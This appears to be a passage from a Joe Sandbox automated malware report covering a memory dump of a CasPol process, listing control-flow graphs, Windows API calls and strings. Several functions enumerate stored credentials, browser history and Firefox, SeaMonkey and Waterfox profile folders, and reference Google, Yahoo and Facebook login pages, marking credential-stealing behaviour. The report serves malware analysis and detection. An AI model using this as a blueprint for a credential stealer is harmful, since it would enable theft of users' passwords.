                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                • API String ID: 2941347001-70141382
                                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 644 44671d-446726 641->644 643 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->643 653 4467ac-4467b7 __setusermatherr 643->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 643->654 646 446747-44674b 644->646 647 446728-44672d 644->647 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->643 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 665 446834-446838 660->665 666 44683a-44683e 660->666 663 446845-44684b 661->663 664 446872-446877 661->664 669 446853-446864 GetStartupInfoW 663->669 670 44684d-446851 663->670 664->661 665->660 665->666 666->663 668 446840-446842 666->668 668->663 671 446866-44686a 669->671 672 446879-44687b 669->672 670->668 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                • String ID:
                                                                                                • API String ID: 2827331108-0
                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                • String ID: visited:
                                                                                                • API String ID: 1157525455-1702587658
                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                APIs
                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                • API String ID: 2804212203-2982631422
                                                                                                • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 115830560-3916222277
                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile$ErrorLastfree
                                                                                                • String ID: |A
                                                                                                • API String ID: 77810686-1717621600
                                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 0041249C
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                • String ID: r!A
                                                                                                • API String ID: 2791114272-628097481
                                                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                • API String ID: 2936932814-4196376884
                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                • String ID: BIN
                                                                                                • API String ID: 1668488027-1015027815
                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                APIs
                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                • String ID:
                                                                                                • API String ID: 697348961-0
                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                • API String ID: 3527940856-11920434
                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                • API String ID: 3527940856-2068335096
                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                • API String ID: 3527940856-3369679110
                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
